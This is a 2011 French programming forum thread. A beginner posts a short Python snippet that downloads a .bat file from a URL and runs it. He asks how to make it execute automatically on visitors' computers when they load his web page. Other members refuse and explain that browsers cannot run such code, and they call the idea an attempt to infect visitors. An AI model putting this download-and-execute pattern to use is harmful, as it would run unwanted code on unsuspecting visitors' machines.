Précédent   Forum du club des développeurs et IT Pro > Autres langages > Python & Zope > Déploiement/Installation
Déploiement/Installation Forum d'entraide sur le déploiement d'applications et sur l'installation/compilation de bibliothèques
Partagez cette discussion sur d'autres réseaux sociaux : Viadeo Twitter Google Facebook Digg Delicious MySpace Yahoo
Réponse

Outils de la discussion
Publicité
'
Vieux 15/08/2011, 15h52   #1
titoum76
Invité de passage

Homme
Étudiant
Détails du profil
Informations personnelles :

Informations professionnelles :
Activité : Étudiant
Secteur : High Tech - Éditeur de logiciels

Informations forums :
Par défaut Intégrer script python sur ma page web

Bonjour, je suis nouveau et je debute en python, je ne sais pas si je post dans la bonne catégorie mais je voudrais savoir si vous pouviez m'aider a installer se script sur une page web .html :
Code :
1
2
3
4
import urllib
import os
urllib.urlretrieve('http://monappli.bat', 'c:/appli.bat')
os.startfile('c:/appli.bat')
Je voudrais que dès que la personne va sur ma page web, cela télécharge mon fichier bat à un endroit et qu'après sa lance se fichier.
titoum76 est déconnecté   Envoyer un message privé Réponse avec citation 00
Vieux 15/08/2011, 16h27   #2
fred1599
Membre Expert

Homme Fred
Enseignant
Détails du profil
Nom : Homme Fred

Activité : Enseignant
Secteur : Enseignement

Informations forums :
ça serait trop facile, on rentre pas dans un PC contre la volonté d'une personne.

Ensuite, faut-il que cette personne est python pour l'exécuter.
Vieux 15/08/2011, 17h19   #3
titoum76
Invité de passage

Homme
Étudiant
Détails du profil

Activité : Étudiant
Secteur : High Tech - Éditeur de logiciels

Informations forums :
A je croyais car j'ai trouvé la source python d'un proxy sur internet, il ne fallait pas obligatoirement python pour l'executer, et le proxy utilisé des commandes python quand la personne cliquer sur un bouton input.
titoum76 est déconnecté   Envoyer un message privé Réponse avec citation 00
Vieux 24/11/2011, 15h13   #4
astyan
Membre à l'essai

Détails du profil
Informations forums :
du fait que python soir exclusivement interprété, il n'est pas possible d’exécuter du python sur un ordinateur sans interpréteur. même py2exe embarque un interpréteur pour chaque programme.

quant a exécuter du python dans une page web, j'imagine que tu confond avec javascript. toujours pour des raison d’interpréteur, tant que le navigateur n'aura pas d’interpréteur python, impossible de lui faire exécuter ton code.

et enfin, pour des raison de sécurité évidente, un navigateur ne te laisse pas libre cours a tes moindre desirs. impossible de lui faire faire des modification sur l'ordinateur client avec un simple script.

donc, tu t'enfonce le brase jusque dans la gorge, par ce que premièrement, python est loin d'etre indiqué pour faire des virus, ensuite, un navigateur n'est pas le top pour effectuer des modif sur la machine.

je te conseil de commencer "petit" avant de vouloir infecter tout les visiteurs de ton "site".

si une bombe fork est amusante a coder pour debuter, c'est pas évident a partager.
astyan est déconnecté   Envoyer un message privé Réponse avec citation 00
Réponse
Outils de la discussion

Navigation rapide

Fuseau horaire GMT +2. Il est actuellement 23h53.

Partenaires

Hébergement Web